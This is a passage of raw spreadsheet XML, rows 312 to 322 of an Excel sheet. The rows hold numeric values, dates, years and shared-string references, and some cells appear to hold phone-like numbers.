        <v>60000</v>
      </c>
      <c r="V312">
        <v>40000</v>
      </c>
      <c r="W312">
        <v>2000</v>
      </c>
      <c r="X312">
        <v>0</v>
      </c>
      <c r="Y312">
        <v>0</v>
      </c>
      <c r="Z312">
        <v>0</v>
      </c>
      <c r="AA312">
        <v>4000</v>
      </c>
      <c r="AB312">
        <v>0</v>
      </c>
      <c r="AC312">
        <v>0</v>
      </c>
      <c r="AD312">
        <v>0</v>
      </c>
      <c r="AE312">
        <v>10000</v>
      </c>
      <c r="AF312" t="s">
        <v>2615</v>
      </c>
      <c r="AG312">
        <v>35212</v>
      </c>
      <c r="AH312">
        <v>10</v>
      </c>
      <c r="AJ312">
        <v>139</v>
      </c>
      <c r="AK312" t="s">
        <v>2616</v>
      </c>
      <c r="AL312" t="s">
        <v>2385</v>
      </c>
      <c r="AM312" t="s">
        <v>2617</v>
      </c>
      <c r="AN312" t="s">
        <v>82</v>
      </c>
      <c r="AO312">
        <v>1998</v>
      </c>
      <c r="AP312" t="s">
        <v>2618</v>
      </c>
      <c r="AQ312" t="s">
        <v>2619</v>
      </c>
      <c r="AR312" t="s">
        <v>2620</v>
      </c>
      <c r="AU312">
        <v>20</v>
      </c>
      <c r="AV312">
        <v>1</v>
      </c>
      <c r="AW312">
        <v>107</v>
      </c>
      <c r="AX312">
        <v>241</v>
      </c>
      <c r="AY312">
        <v>68</v>
      </c>
      <c r="AZ312">
        <v>270</v>
      </c>
      <c r="BA312" t="s">
        <v>16714</v>
      </c>
      <c r="BB312" t="s">
        <v>14653</v>
      </c>
      <c r="BC312">
        <v>0</v>
      </c>
      <c r="BD312" t="s">
        <v>9905</v>
      </c>
    </row>
    <row r="313" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A313">
        <v>949</v>
      </c>
      <c r="B313" t="s">
        <v>2621</v>
      </c>
      <c r="C313" t="s">
        <v>88</v>
      </c>
      <c r="D313" t="s">
        <v>2622</v>
      </c>
      <c r="E313" t="s">
        <v>111</v>
      </c>
      <c r="F313" t="s">
        <v>2623</v>
      </c>
      <c r="G313" s="1">
        <v>43909</v>
      </c>
      <c r="H313">
        <v>799</v>
      </c>
      <c r="I313">
        <v>799</v>
      </c>
      <c r="J313">
        <v>3</v>
      </c>
      <c r="K313">
        <v>3</v>
      </c>
      <c r="L313">
        <v>3</v>
      </c>
      <c r="M313">
        <v>0</v>
      </c>
      <c r="N313">
        <v>0</v>
      </c>
      <c r="O313">
        <v>1</v>
      </c>
      <c r="P313">
        <v>0</v>
      </c>
      <c r="Q313">
        <v>20</v>
      </c>
      <c r="R313">
        <v>5</v>
      </c>
      <c r="S313">
        <v>0</v>
      </c>
      <c r="T313">
        <v>2</v>
      </c>
      <c r="U313">
        <v>500000</v>
      </c>
      <c r="V313">
        <v>150000</v>
      </c>
      <c r="W313">
        <v>200000</v>
      </c>
      <c r="X313">
        <v>0</v>
      </c>
      <c r="Y313">
        <v>0</v>
      </c>
      <c r="Z313">
        <v>5000</v>
      </c>
      <c r="AA313">
        <v>0</v>
      </c>
      <c r="AB313">
        <v>10000</v>
      </c>
      <c r="AC313">
        <v>10000</v>
      </c>
      <c r="AD313">
        <v>0</v>
      </c>
      <c r="AE313">
        <v>20000</v>
      </c>
      <c r="AF313" t="s">
        <v>2624</v>
      </c>
      <c r="AG313">
        <v>80222</v>
      </c>
      <c r="AH313">
        <v>17</v>
      </c>
      <c r="AJ313">
        <v>282</v>
      </c>
      <c r="AK313" t="s">
        <v>592</v>
      </c>
      <c r="AL313" t="s">
        <v>602</v>
      </c>
      <c r="AM313" t="s">
        <v>2625</v>
      </c>
      <c r="AN313" t="s">
        <v>55</v>
      </c>
      <c r="AO313">
        <v>1995</v>
      </c>
      <c r="AP313" t="s">
        <v>2626</v>
      </c>
      <c r="AQ313" t="s">
        <v>2627</v>
      </c>
      <c r="AR313" t="s">
        <v>2628</v>
      </c>
      <c r="AS313" t="s">
        <v>371</v>
      </c>
      <c r="AT313" t="s">
        <v>72</v>
      </c>
      <c r="AU313">
        <v>6</v>
      </c>
      <c r="AV313">
        <v>1</v>
      </c>
      <c r="AW313">
        <v>0</v>
      </c>
      <c r="AX313">
        <v>0</v>
      </c>
      <c r="AY313">
        <v>73</v>
      </c>
      <c r="AZ313">
        <v>55</v>
      </c>
      <c r="BA313" t="s">
        <v>17151</v>
      </c>
      <c r="BB313" t="s">
        <v>14958</v>
      </c>
      <c r="BC313" t="s">
        <v>9746</v>
      </c>
      <c r="BD313" t="s">
        <v>9989</v>
      </c>
    </row>
    <row r="314" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A314">
        <v>1367</v>
      </c>
      <c r="B314" t="s">
        <v>2629</v>
      </c>
      <c r="C314" t="s">
        <v>157</v>
      </c>
      <c r="D314" t="s">
        <v>2630</v>
      </c>
      <c r="E314" t="s">
        <v>363</v>
      </c>
      <c r="F314" t="s">
        <v>2631</v>
      </c>
      <c r="G314" s="1">
        <v>44327</v>
      </c>
      <c r="H314">
        <v>846</v>
      </c>
      <c r="I314">
        <v>846</v>
      </c>
      <c r="J314">
        <v>0</v>
      </c>
      <c r="K314">
        <v>0</v>
      </c>
      <c r="L314">
        <v>0</v>
      </c>
      <c r="M314">
        <v>0</v>
      </c>
      <c r="N314">
        <v>0</v>
      </c>
      <c r="O314">
        <v>0</v>
      </c>
      <c r="P314">
        <v>0</v>
      </c>
      <c r="Q314">
        <v>0</v>
      </c>
      <c r="R314">
        <v>0</v>
      </c>
      <c r="S314">
        <v>0</v>
      </c>
      <c r="T314">
        <v>1</v>
      </c>
      <c r="U314">
        <v>0</v>
      </c>
      <c r="V314">
        <v>0</v>
      </c>
      <c r="W314">
        <v>0</v>
      </c>
      <c r="X314">
        <v>0</v>
      </c>
      <c r="Y314">
        <v>0</v>
      </c>
      <c r="Z314">
        <v>0</v>
      </c>
      <c r="AA314">
        <v>0</v>
      </c>
      <c r="AB314">
        <v>0</v>
      </c>
      <c r="AC314">
        <v>0</v>
      </c>
      <c r="AD314">
        <v>0</v>
      </c>
      <c r="AE314">
        <v>5000</v>
      </c>
      <c r="AF314" t="s">
        <v>2632</v>
      </c>
      <c r="AG314">
        <v>61257</v>
      </c>
      <c r="AH314">
        <v>16</v>
      </c>
      <c r="AJ314">
        <v>242</v>
      </c>
      <c r="AK314" t="s">
        <v>1164</v>
      </c>
      <c r="AL314" t="s">
        <v>2633</v>
      </c>
      <c r="AM314" t="s">
        <v>2634</v>
      </c>
      <c r="AN314" t="s">
        <v>68</v>
      </c>
      <c r="AO314">
        <v>2018</v>
      </c>
      <c r="AP314">
        <v>82140605579</v>
      </c>
      <c r="AQ314">
        <v>82140605579</v>
      </c>
      <c r="AR314" t="s">
        <v>2632</v>
      </c>
      <c r="AS314" t="s">
        <v>71</v>
      </c>
      <c r="AT314" t="s">
        <v>72</v>
      </c>
      <c r="AU314">
        <v>25</v>
      </c>
      <c r="AV314">
        <v>1</v>
      </c>
      <c r="AW314">
        <v>0</v>
      </c>
      <c r="AX314">
        <v>0</v>
      </c>
      <c r="AY314">
        <v>5</v>
      </c>
      <c r="AZ314">
        <v>5</v>
      </c>
      <c r="BA314" t="s">
        <v>16859</v>
      </c>
      <c r="BB314" t="s">
        <v>15214</v>
      </c>
      <c r="BC314">
        <v>0</v>
      </c>
      <c r="BD314" t="s">
        <v>9954</v>
      </c>
    </row>
    <row r="315" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A315">
        <v>1141</v>
      </c>
      <c r="B315" t="s">
        <v>2635</v>
      </c>
      <c r="C315" t="s">
        <v>168</v>
      </c>
      <c r="D315" t="s">
        <v>2636</v>
      </c>
      <c r="E315" t="s">
        <v>142</v>
      </c>
      <c r="F315" t="s">
        <v>2637</v>
      </c>
      <c r="G315" s="1">
        <v>43861</v>
      </c>
      <c r="H315">
        <v>852</v>
      </c>
      <c r="I315">
        <v>852</v>
      </c>
      <c r="J315">
        <v>4</v>
      </c>
      <c r="K315">
        <v>1</v>
      </c>
      <c r="L315">
        <v>3</v>
      </c>
      <c r="M315">
        <v>3</v>
      </c>
      <c r="N315">
        <v>0</v>
      </c>
      <c r="O315">
        <v>0</v>
      </c>
      <c r="P315">
        <v>0</v>
      </c>
      <c r="Q315">
        <v>0</v>
      </c>
      <c r="R315">
        <v>0</v>
      </c>
      <c r="S315">
        <v>0</v>
      </c>
      <c r="T315">
        <v>1</v>
      </c>
      <c r="U315">
        <v>1000000</v>
      </c>
      <c r="V315">
        <v>100</v>
      </c>
      <c r="W315">
        <v>9000</v>
      </c>
      <c r="X315">
        <v>6000</v>
      </c>
      <c r="Y315">
        <v>0</v>
      </c>
      <c r="Z315">
        <v>0</v>
      </c>
      <c r="AA315">
        <v>0</v>
      </c>
      <c r="AB315">
        <v>0</v>
      </c>
      <c r="AC315">
        <v>0</v>
      </c>
      <c r="AD315">
        <v>0</v>
      </c>
      <c r="AE315">
        <v>5000</v>
      </c>
      <c r="AF315" t="s">
        <v>2638</v>
      </c>
      <c r="AG315">
        <v>45151</v>
      </c>
      <c r="AH315">
        <v>13</v>
      </c>
      <c r="AJ315">
        <v>169</v>
      </c>
      <c r="AK315" t="s">
        <v>2639</v>
      </c>
      <c r="AL315" t="s">
        <v>2640</v>
      </c>
      <c r="AM315" t="s">
        <v>2641</v>
      </c>
      <c r="AN315" t="s">
        <v>82</v>
      </c>
      <c r="AO315">
        <v>1991</v>
      </c>
      <c r="AP315">
        <v>2318227463</v>
      </c>
      <c r="AQ315" t="s">
        <v>2642</v>
      </c>
      <c r="AR315" t="s">
        <v>2638</v>
      </c>
      <c r="AU315">
        <v>30</v>
      </c>
      <c r="AV315">
        <v>3</v>
      </c>
      <c r="AW315">
        <v>55</v>
      </c>
      <c r="AX315">
        <v>45</v>
      </c>
      <c r="AY315">
        <v>9</v>
      </c>
      <c r="AZ315">
        <v>4</v>
      </c>
      <c r="BA315" t="s">
        <v>15857</v>
      </c>
      <c r="BB315" t="s">
        <v>15079</v>
      </c>
      <c r="BC315">
        <v>0</v>
      </c>
      <c r="BD315" t="s">
        <v>10153</v>
      </c>
    </row>
    <row r="316" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A316">
        <v>1304</v>
      </c>
      <c r="B316" t="s">
        <v>2643</v>
      </c>
      <c r="C316" t="s">
        <v>88</v>
      </c>
      <c r="D316" t="s">
        <v>2644</v>
      </c>
      <c r="E316" t="s">
        <v>142</v>
      </c>
      <c r="F316" t="s">
        <v>2645</v>
      </c>
      <c r="G316" s="1">
        <v>44104</v>
      </c>
      <c r="H316">
        <v>868</v>
      </c>
      <c r="I316">
        <v>868</v>
      </c>
      <c r="J316">
        <v>2</v>
      </c>
      <c r="K316">
        <v>0</v>
      </c>
      <c r="L316">
        <v>1</v>
      </c>
      <c r="M316">
        <v>0</v>
      </c>
      <c r="N316">
        <v>0</v>
      </c>
      <c r="O316">
        <v>0</v>
      </c>
      <c r="P316">
        <v>0</v>
      </c>
      <c r="Q316">
        <v>0</v>
      </c>
      <c r="R316">
        <v>0</v>
      </c>
      <c r="S316">
        <v>0</v>
      </c>
      <c r="T316">
        <v>1</v>
      </c>
      <c r="U316">
        <v>100000</v>
      </c>
      <c r="V316">
        <v>0</v>
      </c>
      <c r="W316">
        <v>50000</v>
      </c>
      <c r="X316">
        <v>0</v>
      </c>
      <c r="Y316">
        <v>0</v>
      </c>
      <c r="Z316">
        <v>0</v>
      </c>
      <c r="AA316">
        <v>0</v>
      </c>
      <c r="AB316">
        <v>0</v>
      </c>
      <c r="AC316">
        <v>0</v>
      </c>
      <c r="AD316">
        <v>0</v>
      </c>
      <c r="AE316">
        <v>50000</v>
      </c>
      <c r="AF316" t="s">
        <v>2646</v>
      </c>
      <c r="AG316">
        <v>80222</v>
      </c>
      <c r="AH316">
        <v>17</v>
      </c>
      <c r="AJ316">
        <v>282</v>
      </c>
      <c r="AK316" t="s">
        <v>592</v>
      </c>
      <c r="AL316" t="s">
        <v>593</v>
      </c>
      <c r="AM316" t="s">
        <v>2647</v>
      </c>
      <c r="AN316" t="s">
        <v>82</v>
      </c>
      <c r="AO316">
        <v>2016</v>
      </c>
      <c r="AP316">
        <v>361726599</v>
      </c>
      <c r="AQ316" t="s">
        <v>2648</v>
      </c>
      <c r="AR316" t="s">
        <v>2646</v>
      </c>
      <c r="AS316" t="s">
        <v>71</v>
      </c>
      <c r="AT316" t="s">
        <v>86</v>
      </c>
      <c r="AU316">
        <v>25</v>
      </c>
      <c r="AV316">
        <v>0</v>
      </c>
      <c r="AW316">
        <v>0</v>
      </c>
      <c r="AX316">
        <v>0</v>
      </c>
      <c r="AY316">
        <v>210</v>
      </c>
      <c r="AZ316">
        <v>44</v>
      </c>
      <c r="BA316" t="s">
        <v>16841</v>
      </c>
      <c r="BB316" t="s">
        <v>15186</v>
      </c>
      <c r="BC316">
        <v>0</v>
      </c>
      <c r="BD316" t="s">
        <v>12019</v>
      </c>
    </row>
    <row r="317" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A317">
        <v>927</v>
      </c>
      <c r="B317" t="s">
        <v>2649</v>
      </c>
      <c r="C317" t="s">
        <v>74</v>
      </c>
      <c r="D317" t="s">
        <v>2650</v>
      </c>
      <c r="E317" t="s">
        <v>2651</v>
      </c>
      <c r="F317" t="s">
        <v>2652</v>
      </c>
      <c r="G317" s="1">
        <v>44286</v>
      </c>
      <c r="H317">
        <v>906</v>
      </c>
      <c r="I317">
        <v>906</v>
      </c>
      <c r="J317">
        <v>3</v>
      </c>
      <c r="K317">
        <v>0</v>
      </c>
      <c r="L317">
        <v>1</v>
      </c>
      <c r="M317">
        <v>6</v>
      </c>
      <c r="N317">
        <v>2000</v>
      </c>
      <c r="O317">
        <v>0</v>
      </c>
      <c r="P317">
        <v>0</v>
      </c>
      <c r="Q317">
        <v>0</v>
      </c>
      <c r="R317">
        <v>0</v>
      </c>
      <c r="S317">
        <v>0</v>
      </c>
      <c r="T317">
        <v>0</v>
      </c>
      <c r="U317">
        <v>1500000</v>
      </c>
      <c r="V317">
        <v>0</v>
      </c>
      <c r="W317">
        <v>5000</v>
      </c>
      <c r="X317">
        <v>18000</v>
      </c>
      <c r="Y317">
        <v>0</v>
      </c>
      <c r="Z317">
        <v>0</v>
      </c>
      <c r="AA317">
        <v>0</v>
      </c>
      <c r="AB317">
        <v>0</v>
      </c>
      <c r="AC317">
        <v>0</v>
      </c>
      <c r="AD317">
        <v>0</v>
      </c>
      <c r="AE317">
        <v>0</v>
      </c>
      <c r="AF317" t="s">
        <v>2653</v>
      </c>
      <c r="AG317">
        <v>50113</v>
      </c>
      <c r="AH317">
        <v>14</v>
      </c>
      <c r="AJ317">
        <v>220</v>
      </c>
      <c r="AK317" t="s">
        <v>2654</v>
      </c>
      <c r="AL317" t="s">
        <v>2655</v>
      </c>
      <c r="AM317" t="s">
        <v>2656</v>
      </c>
      <c r="AN317" t="s">
        <v>55</v>
      </c>
      <c r="AO317">
        <v>2003</v>
      </c>
      <c r="AP317" t="s">
        <v>2657</v>
      </c>
      <c r="AQ317" t="s">
        <v>2658</v>
      </c>
      <c r="AR317" t="s">
        <v>2653</v>
      </c>
      <c r="AS317" t="s">
        <v>71</v>
      </c>
      <c r="AT317" t="s">
        <v>58</v>
      </c>
      <c r="AU317">
        <v>25</v>
      </c>
      <c r="AV317">
        <v>1</v>
      </c>
      <c r="AW317">
        <v>0</v>
      </c>
      <c r="AX317">
        <v>150</v>
      </c>
      <c r="AY317">
        <v>53</v>
      </c>
      <c r="AZ317">
        <v>15</v>
      </c>
      <c r="BA317" t="s">
        <v>16775</v>
      </c>
      <c r="BB317" t="s">
        <v>14941</v>
      </c>
      <c r="BC317">
        <v>0</v>
      </c>
      <c r="BD317">
        <v>0</v>
      </c>
    </row>
    <row r="318" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A318">
        <v>1568</v>
      </c>
      <c r="B318" t="s">
        <v>2659</v>
      </c>
      <c r="C318" t="s">
        <v>318</v>
      </c>
      <c r="D318" t="s">
        <v>2660</v>
      </c>
      <c r="E318" t="s">
        <v>1245</v>
      </c>
      <c r="F318" t="s">
        <v>2661</v>
      </c>
      <c r="G318" s="1">
        <v>43851</v>
      </c>
      <c r="H318">
        <v>954</v>
      </c>
      <c r="I318">
        <v>954</v>
      </c>
      <c r="J318">
        <v>0</v>
      </c>
      <c r="K318">
        <v>0</v>
      </c>
      <c r="L318">
        <v>0</v>
      </c>
      <c r="M318">
        <v>0</v>
      </c>
      <c r="N318">
        <v>0</v>
      </c>
      <c r="O318">
        <v>0</v>
      </c>
      <c r="P318">
        <v>0</v>
      </c>
      <c r="Q318">
        <v>5</v>
      </c>
      <c r="R318">
        <v>3</v>
      </c>
      <c r="S318">
        <v>0</v>
      </c>
      <c r="T318">
        <v>0</v>
      </c>
      <c r="U318">
        <v>0</v>
      </c>
      <c r="V318">
        <v>0</v>
      </c>
      <c r="W318">
        <v>0</v>
      </c>
      <c r="X318">
        <v>0</v>
      </c>
      <c r="Y318">
        <v>0</v>
      </c>
      <c r="Z318">
        <v>0</v>
      </c>
      <c r="AA318">
        <v>0</v>
      </c>
      <c r="AB318">
        <v>300</v>
      </c>
      <c r="AC318">
        <v>1500</v>
      </c>
      <c r="AD318">
        <v>0</v>
      </c>
      <c r="AE318">
        <v>0</v>
      </c>
      <c r="AF318" t="s">
        <v>2662</v>
      </c>
      <c r="AG318">
        <v>0</v>
      </c>
      <c r="AH318">
        <v>26</v>
      </c>
      <c r="AJ318">
        <v>420</v>
      </c>
      <c r="AK318" t="s">
        <v>2663</v>
      </c>
      <c r="AL318" t="s">
        <v>2664</v>
      </c>
      <c r="AM318" t="s">
        <v>2665</v>
      </c>
      <c r="AN318" t="s">
        <v>55</v>
      </c>
      <c r="AO318">
        <v>2018</v>
      </c>
      <c r="AP318">
        <v>8114480897</v>
      </c>
      <c r="AQ318" t="s">
        <v>2666</v>
      </c>
      <c r="AR318" t="s">
        <v>2667</v>
      </c>
      <c r="AS318" t="s">
        <v>71</v>
      </c>
      <c r="AT318" t="s">
        <v>58</v>
      </c>
      <c r="AU318">
        <v>26</v>
      </c>
      <c r="AV318">
        <v>2</v>
      </c>
      <c r="AW318">
        <v>5</v>
      </c>
      <c r="AX318">
        <v>1</v>
      </c>
      <c r="AY318">
        <v>3</v>
      </c>
      <c r="AZ318">
        <v>0</v>
      </c>
      <c r="BA318" t="s">
        <v>16937</v>
      </c>
      <c r="BB318" t="s">
        <v>15371</v>
      </c>
      <c r="BC318">
        <v>0</v>
      </c>
      <c r="BD318">
        <v>0</v>
      </c>
    </row>
    <row r="319" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A319">
        <v>1178</v>
      </c>
      <c r="B319" t="s">
        <v>2668</v>
      </c>
      <c r="C319" t="s">
        <v>318</v>
      </c>
      <c r="D319" t="s">
        <v>2669</v>
      </c>
      <c r="E319" t="s">
        <v>2670</v>
      </c>
      <c r="F319" t="s">
        <v>2671</v>
      </c>
      <c r="G319" s="1">
        <v>43875</v>
      </c>
      <c r="H319">
        <v>986</v>
      </c>
      <c r="I319">
        <v>986</v>
      </c>
      <c r="J319">
        <v>0</v>
      </c>
      <c r="K319">
        <v>0</v>
      </c>
      <c r="L319">
        <v>0</v>
      </c>
      <c r="M319">
        <v>0</v>
      </c>
      <c r="N319">
        <v>0</v>
      </c>
      <c r="O319">
        <v>0</v>
      </c>
      <c r="P319">
        <v>0</v>
      </c>
      <c r="Q319">
        <v>2</v>
      </c>
      <c r="R319">
        <v>0</v>
      </c>
      <c r="S319">
        <v>0</v>
      </c>
      <c r="T319">
        <v>1</v>
      </c>
      <c r="U319">
        <v>0</v>
      </c>
      <c r="V319">
        <v>0</v>
      </c>
      <c r="W319">
        <v>0</v>
      </c>
      <c r="X319">
        <v>0</v>
      </c>
      <c r="Y319">
        <v>0</v>
      </c>
      <c r="Z319">
        <v>0</v>
      </c>
      <c r="AA319">
        <v>0</v>
      </c>
      <c r="AB319">
        <v>500</v>
      </c>
      <c r="AC319">
        <v>0</v>
      </c>
      <c r="AD319">
        <v>0</v>
      </c>
      <c r="AE319">
        <v>500</v>
      </c>
      <c r="AF319" t="s">
        <v>2672</v>
      </c>
      <c r="AG319">
        <v>90000</v>
      </c>
      <c r="AH319">
        <v>26</v>
      </c>
      <c r="AJ319">
        <v>413</v>
      </c>
      <c r="AK319" t="s">
        <v>2673</v>
      </c>
      <c r="AL319" t="s">
        <v>2674</v>
      </c>
      <c r="AM319" t="s">
        <v>2675</v>
      </c>
      <c r="AN319" t="s">
        <v>68</v>
      </c>
      <c r="AO319">
        <v>2008</v>
      </c>
      <c r="AP319">
        <v>81342523008</v>
      </c>
      <c r="AQ319" t="s">
        <v>2676</v>
      </c>
      <c r="AR319" t="s">
        <v>2672</v>
      </c>
      <c r="AS319" t="s">
        <v>71</v>
      </c>
      <c r="AT319" t="s">
        <v>72</v>
      </c>
      <c r="AU319">
        <v>26</v>
      </c>
      <c r="AV319">
        <v>0</v>
      </c>
      <c r="AW319">
        <v>0</v>
      </c>
      <c r="AX319">
        <v>0</v>
      </c>
      <c r="AY319">
        <v>1</v>
      </c>
      <c r="AZ319">
        <v>13</v>
      </c>
      <c r="BA319" t="s">
        <v>16815</v>
      </c>
      <c r="BB319" t="s">
        <v>15102</v>
      </c>
      <c r="BC319" t="s">
        <v>10014</v>
      </c>
      <c r="BD319" t="s">
        <v>10015</v>
      </c>
    </row>
    <row r="320" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A320">
        <v>1452</v>
      </c>
      <c r="B320" t="s">
        <v>2677</v>
      </c>
      <c r="C320" t="s">
        <v>318</v>
      </c>
      <c r="D320" t="s">
        <v>2678</v>
      </c>
      <c r="E320" t="s">
        <v>363</v>
      </c>
      <c r="F320" t="s">
        <v>364</v>
      </c>
      <c r="G320" s="1">
        <v>44301</v>
      </c>
      <c r="H320">
        <v>1009</v>
      </c>
      <c r="I320">
        <v>1009</v>
      </c>
      <c r="J320">
        <v>0</v>
      </c>
      <c r="K320">
        <v>0</v>
      </c>
      <c r="L320">
        <v>0</v>
      </c>
      <c r="M320">
        <v>0</v>
      </c>
      <c r="N320">
        <v>0</v>
      </c>
      <c r="O320">
        <v>0</v>
      </c>
      <c r="P320">
        <v>0</v>
      </c>
      <c r="Q320">
        <v>0</v>
      </c>
      <c r="R320">
        <v>0</v>
      </c>
      <c r="S320">
        <v>0</v>
      </c>
      <c r="T320">
        <v>2</v>
      </c>
      <c r="U320">
        <v>0</v>
      </c>
      <c r="V320">
        <v>0</v>
      </c>
      <c r="W320">
        <v>0</v>
      </c>
      <c r="X320">
        <v>0</v>
      </c>
      <c r="Y320">
        <v>0</v>
      </c>
      <c r="Z320">
        <v>0</v>
      </c>
      <c r="AA320">
        <v>0</v>
      </c>
      <c r="AB320">
        <v>0</v>
      </c>
      <c r="AC320">
        <v>0</v>
      </c>
      <c r="AD320">
        <v>0</v>
      </c>
      <c r="AE320">
        <v>250000</v>
      </c>
      <c r="AF320" t="s">
        <v>2679</v>
      </c>
      <c r="AG320">
        <v>90244</v>
      </c>
      <c r="AH320">
        <v>26</v>
      </c>
      <c r="AJ320">
        <v>420</v>
      </c>
      <c r="AK320" t="s">
        <v>936</v>
      </c>
      <c r="AL320" t="s">
        <v>2680</v>
      </c>
      <c r="AM320" t="s">
        <v>2681</v>
      </c>
      <c r="AN320" t="s">
        <v>55</v>
      </c>
      <c r="AO320">
        <v>2018</v>
      </c>
      <c r="AP320">
        <v>8114115125</v>
      </c>
      <c r="AQ320" t="s">
        <v>2682</v>
      </c>
      <c r="AR320" t="s">
        <v>2679</v>
      </c>
      <c r="AS320" t="s">
        <v>371</v>
      </c>
      <c r="AT320" t="s">
        <v>58</v>
      </c>
      <c r="AU320">
        <v>25</v>
      </c>
      <c r="AV320">
        <v>1</v>
      </c>
      <c r="AW320">
        <v>2</v>
      </c>
      <c r="AX320">
        <v>5</v>
      </c>
      <c r="AY320">
        <v>2</v>
      </c>
      <c r="AZ320">
        <v>0</v>
      </c>
      <c r="BA320" t="s">
        <v>16899</v>
      </c>
      <c r="BB320" t="s">
        <v>16898</v>
      </c>
      <c r="BC320" t="s">
        <v>9436</v>
      </c>
      <c r="BD320" t="s">
        <v>13402</v>
      </c>
    </row>
    <row r="321" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A321">
        <v>1344</v>
      </c>
      <c r="B321" t="s">
        <v>2683</v>
      </c>
      <c r="C321" t="s">
        <v>157</v>
      </c>
      <c r="D321" t="s">
        <v>2684</v>
      </c>
      <c r="E321" t="s">
        <v>1161</v>
      </c>
      <c r="F321" t="s">
        <v>2685</v>
      </c>
      <c r="G321" s="1">
        <v>43922</v>
      </c>
      <c r="H321">
        <v>1018</v>
      </c>
      <c r="I321">
        <v>1018</v>
      </c>
      <c r="J321">
        <v>3</v>
      </c>
      <c r="K321">
        <v>1</v>
      </c>
      <c r="L321">
        <v>1</v>
      </c>
      <c r="M321">
        <v>0</v>
      </c>
      <c r="N321">
        <v>0</v>
      </c>
      <c r="O321">
        <v>0</v>
      </c>
      <c r="P321">
        <v>0</v>
      </c>
      <c r="Q321">
        <v>0</v>
      </c>
      <c r="R321">
        <v>0</v>
      </c>
      <c r="S321">
        <v>1</v>
      </c>
      <c r="T321">
        <v>0</v>
      </c>
      <c r="U321">
        <v>900</v>
      </c>
      <c r="V321">
        <v>10</v>
      </c>
      <c r="W321">
        <v>4</v>
      </c>
      <c r="X321">
        <v>0</v>
      </c>
      <c r="Y321">
        <v>0</v>
      </c>
      <c r="Z321">
        <v>0</v>
      </c>
      <c r="AA321">
        <v>0</v>
      </c>
      <c r="AB321">
        <v>0</v>
      </c>
      <c r="AC321">
        <v>0</v>
      </c>
      <c r="AD321">
        <v>1</v>
      </c>
      <c r="AE321">
        <v>0</v>
      </c>
      <c r="AF321" t="s">
        <v>2686</v>
      </c>
      <c r="AG321">
        <v>67217</v>
      </c>
      <c r="AH321">
        <v>16</v>
      </c>
      <c r="AJ321">
        <v>260</v>
      </c>
      <c r="AK321" t="s">
        <v>425</v>
      </c>
      <c r="AL321" t="s">
        <v>2687</v>
      </c>
      <c r="AM321" t="s">
        <v>2688</v>
      </c>
      <c r="AN321" t="s">
        <v>55</v>
      </c>
      <c r="AO321">
        <v>2015</v>
      </c>
      <c r="AP321">
        <v>85223118877</v>
      </c>
      <c r="AQ321" t="s">
        <v>2686</v>
      </c>
      <c r="AR321" t="s">
        <v>2686</v>
      </c>
      <c r="AS321" t="s">
        <v>71</v>
      </c>
      <c r="AT321" t="s">
        <v>58</v>
      </c>
      <c r="AU321">
        <v>26</v>
      </c>
      <c r="AV321">
        <v>0</v>
      </c>
      <c r="AW321">
        <v>20</v>
      </c>
      <c r="AX321">
        <v>2</v>
      </c>
      <c r="AY321">
        <v>24</v>
      </c>
      <c r="AZ321">
        <v>7</v>
      </c>
      <c r="BA321" t="s">
        <v>16850</v>
      </c>
      <c r="BB321" t="s">
        <v>15213</v>
      </c>
      <c r="BC321" t="s">
        <v>10073</v>
      </c>
      <c r="BD321">
        <v>0</v>
      </c>
    </row>
    <row r="322" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A322">
        <v>1514</v>
      </c>
      <c r="B322" t="s">
        <v>2689</v>
      </c>
      <c r="C322" t="s">
        <v>157</v>
      </c>
      <c r="D322" t="s">
        <v>2690</v>
      </c>
      <c r="E322" t="s">
        <v>142</v>
      </c>
      <c r="F322" t="s">
        <v>2374</v>
      </c>
      <c r="G322" s="1">
        <v>43850</v>
      </c>
      <c r="H322">
        <v>1073</v>
      </c>
      <c r="I322">
        <v>1073</v>
      </c>
      <c r="J322">
        <v>2</v>
      </c>
      <c r="K322">
        <v>0</v>
      </c>
      <c r="L322">
        <v>1</v>
      </c>
      <c r="M322">
        <v>0</v>
      </c>
      <c r="N322">
        <v>0</v>
      </c>
      <c r="O322">
        <v>0</v>
      </c>
      <c r="P322">
        <v>0</v>
      </c>
      <c r="Q322">
        <v>10</v>
      </c>
      <c r="R322">
        <v>10</v>
      </c>
      <c r="S322">
        <v>0</v>
      </c>
      <c r="T322">
        <v>0</v>
      </c>
      <c r="U322">
        <v>200000</v>
      </c>
      <c r="V322">
        <v>0</v>
      </c>
      <c r="W322">
        <v>4000</v>
      </c>
      <c r="X322">
        <v>0</v>
      </c>
      <c r="Y322">
        <v>0</v>
      </c>
      <c r="Z322">
        <v>0</v>
      </c>
      <c r="AA322">
        <v>0</v>
      </c>
      <c r="AB322">
        <v>1000</v>
      </c>
      <c r="AC322">
        <v>1000</v>
      </c>
      <c r="AD322">
        <v>0</v>
      </c>
      <c r="AE322">
        <v>0</v>
      </c>
      <c r="AF322" t="s">
        <v>2691</v>
      </c>
      <c r="AG322">
        <v>66382</v>
      </c>
      <c r="AH322">
        <v>16</v>
      </c>
      <c r="AJ322">
        <v>230</v>
      </c>
      <c r="AK322" t="s">
        <v>2692</v>
      </c>
      <c r="AL322" t="s">
        <v>2693</v>
      </c>
      <c r="AM322" t="s">
        <v>2694</v>
      </c>
      <c r="AN322" t="s">
        <v>55</v>
      </c>
      <c r="AO322">
        <v>2019</v>
      </c>
      <c r="AP322">
        <v>217270663</v>
      </c>
      <c r="AQ322" t="s">
        <v>2695</v>
      </c>
      <c r="AR322" t="s">
        <v>2691</v>
      </c>
      <c r="AS322" t="s">
        <v>71</v>
      </c>
      <c r="AT322" t="s">
        <v>58</v>
      </c>
      <c r="AU322">
        <v>54</v>
      </c>
      <c r="AV322">
        <v>4</v>
      </c>
      <c r="AW322">
        <v>8</v>
      </c>
      <c r="AX322">
        <v>4</v>
      </c>
      <c r="AY322">
        <v>2</v>
      </c>
      <c r="AZ322">
        <v>1</v>
      </c>
      <c r="BA322" t="s">
        <v>16921</v>
      </c>
